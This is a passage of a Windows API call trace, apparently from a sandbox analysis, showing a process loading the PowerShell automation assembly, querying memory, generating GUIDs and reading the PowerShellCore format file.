	[0402.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.354] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.354] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.354] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.355] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.355] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.355] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.355] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.355] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xfd2346ae, Data2=0x3e49, Data3=0x4d06, Data4=([0]=0xa3, [1]=0xc0, [2]=0x49, [3]=0xa4, [4]=0x86, [5]=0x33, [6]=0x80, [7]=0xd3))) returned 0x0
	[0402.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.356] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.356] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.356] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.356] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.356] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.357] VirtualQuery (in: lpAddress=0x28bb80, lpBuffer=0x28ca40, dwLength=0x30 | out: lpBuffer=0x28ca40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.358] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.358] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.358] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.358] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.358] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x553258f9, Data2=0x1433, Data3=0x434f, Data4=([0]=0x89, [1]=0x7f, [2]=0x3b, [3]=0xb0, [4]=0xae, [5]=0x98, [6]=0x86, [7]=0xe0))) returned 0x0
	[0402.358] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb95d25e7, Data2=0x3e5e, Data3=0x4c9e, Data4=([0]=0x82, [1]=0x10, [2]=0x81, [3]=0x63, [4]=0xab, [5]=0x6a, [6]=0xb, [7]=0x58))) returned 0x0
	[0402.359] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xe27fec75, Data2=0x7180, Data3=0x4ea3, Data4=([0]=0x9c, [1]=0x7d, [2]=0x8c, [3]=0xeb, [4]=0x7a, [5]=0x13, [6]=0x4f, [7]=0xbb))) returned 0x0
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.360] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x2d69438e, Data2=0xba8f, Data3=0x4ead, Data4=([0]=0x98, [1]=0x34, [2]=0xc2, [3]=0x65, [4]=0xf3, [5]=0xc9, [6]=0x9c, [7]=0xd9))) returned 0x0
	[0402.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.362] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x751b72e2, Data2=0x4f7d, Data3=0x433c, Data4=([0]=0xb7, [1]=0x6b, [2]=0x97, [3]=0xb1, [4]=0x26, [5]=0x5c, [6]=0x55, [7]=0x69))) returned 0x0
	[0402.362] VirtualQuery (in: lpAddress=0x28bc90, lpBuffer=0x28cb50, dwLength=0x30 | out: lpBuffer=0x28cb50*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.362] VirtualQuery (in: lpAddress=0x28bd20, lpBuffer=0x28cbe0, dwLength=0x30 | out: lpBuffer=0x28cbe0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.362] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x3dc174f4, Data2=0x332f, Data3=0x4ccd, Data4=([0]=0xa7, [1]=0x92, [2]=0x87, [3]=0x7b, [4]=0xcf, [5]=0x97, [6]=0xc0, [7]=0xd0))) returned 0x0
	[0402.363] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc443d19a, Data2=0x94f3, Data3=0x4b52, Data4=([0]=0xb9, [1]=0xf9, [2]=0x6d, [3]=0xaa, [4]=0xf1, [5]=0xcd, [6]=0xaf, [7]=0x1))) returned 0x0
	[0402.363] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xe9a588e4, Data2=0xc4b4, Data3=0x4073, Data4=([0]=0xbc, [1]=0xac, [2]=0x39, [3]=0x7d, [4]=0x2e, [5]=0xdc, [6]=0x5d, [7]=0x57))) returned 0x0
	[0402.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0402.364] SetErrorMode (uMode=0x1) returned 0x1
	[0402.364] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0402.364] GetFileType (hFile=0x1c8) returned 0x1
	[0402.364] SetErrorMode (uMode=0x1) returned 0x1
	[0402.364] GetFileType (hFile=0x1c8) returned 0x1
	[0402.364] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.365] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.367] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0402.367] ReadFile (in: hFile=0x1c8, lpBuffer=0x300f318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x300f318*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
